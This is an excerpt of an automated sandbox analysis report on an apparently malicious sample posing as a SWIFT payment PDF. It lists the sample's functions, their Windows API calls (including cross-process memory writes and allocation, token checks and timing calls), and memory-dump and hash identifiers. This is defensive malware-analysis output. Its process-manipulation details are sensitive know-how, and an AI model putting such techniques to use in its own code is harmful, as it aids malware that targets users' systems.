                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: a412cc6d30634cd6edbee3c538251b7154c968e87fd862b2d3a2e87c87ecfd1e
                                                                                    • Instruction ID: 5e8ad747efc6c692bd6bcf82359b054225db39960b6985397e754948b1b65635
                                                                                    • Opcode Fuzzy Hash: a412cc6d30634cd6edbee3c538251b7154c968e87fd862b2d3a2e87c87ecfd1e
                                                                                    • Instruction Fuzzy Hash: BB017876611208FFEB108F69EC44AAABBADEF45792F148024FD06D2210D774DD48ABA0
                                                                                    Function 00967A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967A74
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00967A82
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00967A8A
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00967A94
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: 7666e4912c4b81219473068960d006719d2179b85fda414c4bd47efe4e1b1c6d
                                                                                    • Instruction ID: 606e48e16cdfc6b7e374e8f0b24182dccb4b337de453ebc7bad59793c3b44c45
                                                                                    • Opcode Fuzzy Hash: 7666e4912c4b81219473068960d006719d2179b85fda414c4bd47efe4e1b1c6d
                                                                                    • Instruction Fuzzy Hash: E3012531C1A629EBDF04AFE4EC48AEDFB78FF09715F000456E902B2260DB3496509BA1
                                                                                    Function 0095AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0095AADA
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAE4
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAF3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAFA
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 490f7aec84426cb4dbe89043a2e34d10c176274f5c9429d6debf30b2d99fca14
                                                                                    • Instruction ID: 3e20a081e88062aec1bf572f303dcbc7b6729489f4eac189f63692b33cfc834a
                                                                                    • Opcode Fuzzy Hash: 490f7aec84426cb4dbe89043a2e34d10c176274f5c9429d6debf30b2d99fca14
                                                                                    • Instruction Fuzzy Hash: 8AF04F712552186FEB114FA5EC88EA73B6DFF46755F000129F942C7190DA6098059BB1
                                                                                    Function 0095AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0095AA79
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0095AA83
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0095AA92
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0095AA99
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0095AAAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 4d46d4c4b2bd1c24a5ecda614adc889548bddbf87a465fa54fa6710b685625df
                                                                                    • Instruction ID: 1fe8ba1b545fe5091d691b23d44724e7cea4f04d99258e25b2975775d9f73d8e
                                                                                    • Opcode Fuzzy Hash: 4d46d4c4b2bd1c24a5ecda614adc889548bddbf87a465fa54fa6710b685625df
                                                                                    • Instruction Fuzzy Hash: B9F0C2312153186FEB105FA5EC88EA73BADFF4A755F000119FD02C7190DB609C05DBA1
                                                                                    Function 0095EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0095EC94
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0095ECAB
                                                                                    • MessageBeep.USER32(00000000), ref: 0095ECC3
                                                                                    • KillTimer.USER32(?,0000040A), ref: 0095ECDF
                                                                                    • EndDialog.USER32(?,00000001), ref: 0095ECF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: bd20bdadb6dc6d02ce18ee18f1028370e47a65225e2eac9f1cd96b699a220368
                                                                                    • Instruction ID: d096033abf3ab6e5424688e8abe4ea6500b3a9fe194744f3c67fb47ae9f42013
                                                                                    • Opcode Fuzzy Hash: bd20bdadb6dc6d02ce18ee18f1028370e47a65225e2eac9f1cd96b699a220368
                                                                                    • Instruction Fuzzy Hash: 5A01D130910714ABEB289B10DE4EB967BB8FF00706F000559B993A18E0DBF5AA48CB80
                                                                                    Function 0093B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 0093B0BA
                                                                                    • StrokeAndFillPath.GDI32(?,?,0099E680,00000000,?,?,?), ref: 0093B0D6
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093B0E9
                                                                                    • DeleteObject.GDI32 ref: 0093B0FC
                                                                                    • StrokePath.GDI32(?), ref: 0093B117
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: 2f5f4435f1ae76ddd83e421de977abbfa974d1cd9e36640baecbf9933168f71c
                                                                                    • Instruction ID: 6850d5706c127d847abfb4bd9febbcc467728e1d579d1d29a9f1b494b463ad5e
                                                                                    • Opcode Fuzzy Hash: 2f5f4435f1ae76ddd83e421de977abbfa974d1cd9e36640baecbf9933168f71c
                                                                                    • Instruction Fuzzy Hash: 12F0197002D284EFCB259F65EC4C7A93B64AB01762F088314E566484F0C7348A56EF90
                                                                                    Function 0096F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0096F2DA
                                                                                    • CoCreateInstance.OLE32(009ADA7C,00000000,00000001,009AD8EC,?), ref: 0096F2F2
                                                                                    • CoUninitialize.OLE32 ref: 0096F555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 948891078-24824748
                                                                                    • Opcode ID: 77fb4e37a9623f8aaf2a1360ac9dd814ee92dd8080f67ba3cf0ef0b58c9df9da
                                                                                    • Instruction ID: 53e903f2e2265a0e5fd4bc28c56fd7acf2c492b4488fd9202a785b9940510d73
                                                                                    • Opcode Fuzzy Hash: 77fb4e37a9623f8aaf2a1360ac9dd814ee92dd8080f67ba3cf0ef0b58c9df9da
                                                                                    • Instruction Fuzzy Hash: 26A1F9B1104301AFD700EF64D891EAFB7A8EFD8714F00495DF59697192EB70EA49CBA2
                                                                                    Function 0096E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0092660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009253B1,?,?,009261FF,?,00000000,00000001,00000000), ref: 0092662F
                                                                                    • CoInitialize.OLE32(00000000), ref: 0096E85D
                                                                                    • CoCreateInstance.OLE32(009ADA7C,00000000,00000001,009AD8EC,?), ref: 0096E876
                                                                                    • CoUninitialize.OLE32 ref: 0096E893
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: 2ab88bb56ca6ff21a043795d71b3e56e5763935188f0847251b22ee2be43c8a6
                                                                                    • Instruction ID: 4e5c6b1bf25f4586886ecf8db1cb289e3ecf64370163de01f7f3c6f84c1180dd
                                                                                    • Opcode Fuzzy Hash: 2ab88bb56ca6ff21a043795d71b3e56e5763935188f0847251b22ee2be43c8a6
                                                                                    • Instruction Fuzzy Hash: C8A145796043119FCB14DF24C484A2EBBE9FF89314F148989F9969B3A1CB31ED45CB91
                                                                                    Function 0094325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 009432ED
                                                                                      • Part of subcall function 0094E0D0: __87except.LIBCMT ref: 0094E10B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 4e77ca3338e1f8deca01535551ef85bee9c963880ef63e401903327636894a5c
                                                                                    • Instruction ID: b37c4234785680d099042a33e9fd4bfdc9be2fcbb6048d6d95a33a1af0c576e0
                                                                                    • Opcode Fuzzy Hash: 4e77ca3338e1f8deca01535551ef85bee9c963880ef63e401903327636894a5c
                                                                                    • Instruction Fuzzy Hash: 9A512C31A1C20296CB15BB34C941F7A3B9CFB80760F74CE68F4E5861E9DF788D94AA45
                                                                                    Function 00964606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,009BDC50,?,0000000F,0000000C,00000016,009BDC50,?), ref: 00964645
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009646C5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                                    • String ID: REMOVE$THIS
                                                                                    • API String ID: 3797816924-776492005
                                                                                    • Opcode ID: e9a83e373128687342dc9592498ba03bb7ff7136c146543ee86255fcf9231146
                                                                                    • Instruction ID: 86372dae35743414df2af3e6db39fbfeeed7fb9204ca1a0141d2ac591c08cd63
                                                                                    • Opcode Fuzzy Hash: e9a83e373128687342dc9592498ba03bb7ff7136c146543ee86255fcf9231146
                                                                                    • Instruction Fuzzy Hash: 1041A374A002199FCF05DFA4C881AAEB7F9FF89304F148469E916AB3A2DB34DD45CB50
                                                                                    Function 0095C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0096430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0095BC08,?,?,00000034,00000800,?,00000034), ref: 00964335
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0095C1D3
                                                                                      • Part of subcall function 009642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0095BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00964300
                                                                                      • Part of subcall function 0096422F: GetWindowThreadProcessId.USER32(?,?), ref: 0096425A
                                                                                      • Part of subcall function 0096422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0095BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0096426A
                                                                                      • Part of subcall function 0096422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0095BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00964280
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0095C240
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0095C28D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: ffff4d03a1b4fa6bd984dca34764a2bdb62778f281e191014e65a89fb9d2f284
                                                                                    • Instruction ID: 2effa3f4fb9228cce505fbef9787686a7f3991e821a873b9e294d8d54429f0d8
                                                                                    • Opcode Fuzzy Hash: ffff4d03a1b4fa6bd984dca34764a2bdb62778f281e191014e65a89fb9d2f284
                                                                                    • Instruction Fuzzy Hash: 95413A72900218BFDB10DFA4CD81BEEB7B8AF49700F104095FA55B7181DA71AE49DBA1
                                                                                    Function 0098A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009BDC00,00000000,?,?,?,?), ref: 0098A6D8
                                                                                    • GetWindowLongW.USER32 ref: 0098A6F5
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0098A705
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: 3a04fa3068a2d73d988e82875f49ac0242726e4ee160e637e32e42e6dd42de58
                                                                                    • Instruction ID: 3b65ee46edc3183bffa6d18da00182922da5fbfa716ac6269db8694ffa77415d
                                                                                    • Opcode Fuzzy Hash: 3a04fa3068a2d73d988e82875f49ac0242726e4ee160e637e32e42e6dd42de58
                                                                                    • Instruction Fuzzy Hash: F8319031505206AFEB119E34CC45BEA7BA9FF49338F244716F975932E1D770AC509B90
                                                                                    Function 0098A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0098A15E
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0098A172
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0098A196
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 259c5251d6d6d4e47b731469e23b15ae3241d0bf4f1416c448674c7db400dfd1
                                                                                    • Instruction ID: 20324cf7aea0d02f8973e226011fd7e50bf6db6c1793379be37f579704f6dc9b
                                                                                    • Opcode Fuzzy Hash: 259c5251d6d6d4e47b731469e23b15ae3241d0bf4f1416c448674c7db400dfd1
                                                                                    • Instruction Fuzzy Hash: EC21D132514218ABEF119F94CC86FEA3B79EF88714F100215FA55AB2D0D6B5AC50DB90
                                                                                    Function 0098A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0098A941
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0098A94F
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0098A956
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: 3bd18b0bb947c72e3343030e221ef6019d8d6e31fb0a17228855b2c0060057e5
                                                                                    • Instruction ID: 76933050c86825fb32586b69cc3db6d10efd5eee9405e2c331a9e42127a3998f
                                                                                    • Opcode Fuzzy Hash: 3bd18b0bb947c72e3343030e221ef6019d8d6e31fb0a17228855b2c0060057e5
                                                                                    • Instruction Fuzzy Hash: 7321B0B5604209AFEB10EF18CCD1E6737ACEF5A3A8B04005AFA049B361CB31EC11DB61
                                                                                    Function 009899A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00989A30
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00989A40
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00989A65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
